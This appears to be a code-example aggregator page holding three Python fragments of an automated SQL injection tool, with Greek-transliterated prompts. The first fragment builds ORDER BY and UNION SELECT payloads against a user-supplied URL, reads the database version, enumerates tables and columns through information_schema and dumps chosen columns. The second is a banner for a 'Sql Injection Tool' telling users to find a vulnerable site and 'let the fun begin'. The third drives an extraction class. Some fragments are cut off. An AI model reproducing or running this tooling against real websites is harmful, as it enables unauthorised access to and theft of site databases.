Esempio n. 1
0
 def union_normal(self):

     versions = ["5.1.41","5.1.61","5.0.96","5.1.66","5.1.56"]

     check = 3
     flag='1'
     while flag=='1':
         a=1
         site=raw_input("Give the url: ")
         site=site_alive(site)
         if site=="-1":
             print "No response from server"
             print "Program will exit"
             exit()
         flag=vuln(site)
         if flag=="-1":
             exit()
     site1=site
     site1=site1+"+OrDER+By+"
     columns=ft_cols(site,site1)
     if columns==-1:
         exit()
     site1=site1.replace("+OrDER+By+","")
     
     num_columns="1"
     for i in range (2,columns+1):
         if i==(columns+1):
              num_columns=num_columns+str(i)
         else:
              num_columns=num_columns+","+str(i)
     site=site1+"+UNION+SELECT+%s--" %num_columns
     site=site.replace("'","")
     site=site.replace(flag,flag+"-")
     vuln_column=1
     flag=1
     the_page = get_the_page(site)
     while flag==1:
         if (">"+str(vuln_column)+"<") in the_page:
             flag=0
         else:
             vuln_column=vuln_column+1
         if vuln_column>columns:
             flag=2

     if flag==2:
             print "Den uparxoun vulnerable columns"
             print "Program will exit"
             exit()

     vuln_column=str(vuln_column)
     site=site.replace(",%s" %vuln_column,",@@version",1)
     the_page=get_the_page(site)
     flag=1
     index=0
     while index<len(versions):
         if versions[index] in the_page:
             print "SQL Version: %s" %versions[index]
             index=len(versions)+1
         else:
             index=index+1
     if flag==1:
         if ("5.0" in the_page) or ("5.1" in the_page):
             flag=0

     if flag==1:
         print "Could not get the DB version."
         print "Program will exit"
         exit()

     site=site.replace("@@version","unhex(hex(group_concat(0x3a,0x3a,table_name,0x3a,0x3a,0x0a)))")
     site=site.replace("--","+FROM+information_schema.tables+WHERE+table_schema=database()--")
     the_page=get_the_page(site)
     tables=s_data.search_for(the_page)
     print "Tables found %d" %len(tables)
     print tables
     site=site.replace("table_name","column_name")
     site=site.replace("+FROM+information_schema.tables+WHERE+table_schema=database()--","+FROM+information_schema.columns+WHERE+table_name=0x")
     flag=1
     site1=site
     while flag==1:
         print "Give the table: "
         table1=raw_input(">>>")
         while not(table1 in tables):
             print "Wrong input. Give the table: "
             table1=raw_input(">>>")
         table1=table1.encode("hex")
         site=site1+table1+"--"
         the_page=get_the_page(site)
         columns_found=s_data.search_for(the_page)
         if len(columns_found)==0:
             print "No columns found. Do you want to try an other table? (y/n)"
             ans=raw_input(">>>")
             while not(ans=='y' or ans=='n' or ans=='Y' or ans=='N'):
                 print "No columns found. Do you want to try an other table? (y/n)"
                 ans=raw_input(">>>")
             if ans=='N' or ans=='n':
                 print 'Program will Exit'
                 exit()
             else:
                 flag=1
         elif flag==1:
             print "Columns Found %d" %len(columns_found)
             print "="*80
             print columns_found
             print "="*80

             k=0
             ks=[]
             table_choose=table1.decode("hex")
             site=site.replace("information_schema.columns+WHERE+table_name=0x"+table1+"--",table_choose+"--")
             tal_cols=len(columns_found)
             while tal_cols>0:
                 col_choose=raw_input("Dose ena column (0 gia na mhn dwseis kanena allo): ")
                 while not(col_choose in columns_found) and not(col_choose=='0'):
                     col_choose=raw_input("Dose ena column (0 gia na mhn dwseis kanena allo): ")
                 if col_choose=="0":
                     tal_cols=0
                     site=site.replace(",/**/","")
                 else:
                     if tal_cols==len(columns_found):
                         site=site.replace("column_name","%s,/**/" %col_choose)
                         tal_cols=tal_cols-1
                         k=1
                         ks.append(col_choose)
                     else:
                         site=site.replace(",/**/",",0x3a,0x3a,%s,/**/"%col_choose)
                         tal_cols=tal_cols-1
                         if tal_cols==0:
                             site=site.replace(",/**/",'')
                         ks.append(col_choose)
                         k=k+1
                        
             the_page=get_the_page(site)
             length=len(the_page)
             if k%2==1:
                 total_data=s_data.search_for(the_page)
             else:
                 total_data=s_data.search_for_2(the_page,k)        
             length=len(total_data)
             l=0
             for i in range (0,length,k):
                 j=0
                 while j<k:
                     if j+1==k:
                         print ks[j],":",total_data[l],"|"
                         j=j+1
                         l=l+1
                     else:
                         print ks[j],":",total_data[l],"|",
                         j=j+1
                         l=l+1
             ans=raw_input("8es na deis gia allo table? (y/n): ")
             while not (ans=='y' or ans=='Y' or ans=='n' or ans=='N'):
                 ans=raw_input("8es na deis gia allo table? (y/n): ")
             if ans=='y' or ans=='Y':
                 flag=1
             else:
                 flag=0
Esempio n. 2
0
print "BETA VERSION\n"
print "|<~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>|"
print "|<~~~~~~~ Sql Injection Tool ~~~~~~~>|"
print "|<~~~~~~ Coded By: Mr.Crowley ~~~~~~>|"
print "|<~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>|\n"
print "Instructions:"
print "Find a vulnerable to sql-injection site"
print "paste below the url and let the fun begin! =D"
print "Example: http://www.somesite.com/articles.php?id=1'\n\n"

flag='1'
while flag=='1':
    site=raw_input("Give the url: ")
    if "'" in site:
        site = site_alive(site)
        flag = vuln(site)
    
columns,based=ft_cols(site)
site=uni_cols(site,columns,based)
site=site.replace(flag,flag+"-")
print site
vuln_column=str(f_vuln_col(site,columns))

site=replaces.repl(site,1,vuln_column)

dbs.version(site)
dbs.user(site)
dbs_names=dbs.names(site)
ans=dbs.working_db(site)

if ans=='1':
Esempio n. 3
0
        flag = 1

        while flag:
            # the first param given from terminal, $ python main.py site.com
            try:
                site = sys.argv[1]
            except IndexError:
                print('Enter a url to test:')
                site = input(">>> ")

            # Vazeis edw to url tou site pou einai eupa8es
            # site = "http://www.xxx.xxx/sql.php?id=1'"

            if "'" in site:
                site = site_alive(site)
                vuln_param = vuln(site)
                flag = 0
            else:
                print("Site doesn't look vulnerable")
                print("Enter url with ' :")
                site = input(">>> ")

        if not flag:
            find_data = InjectDatabase(site, vuln_param)
            find_data.total_columns()
            find_data.vulnerable_column()
            find_data.database_information()
            find_data.find_tables_of_database()
            find_data.select_table()
            find_data.search_data_from_columns()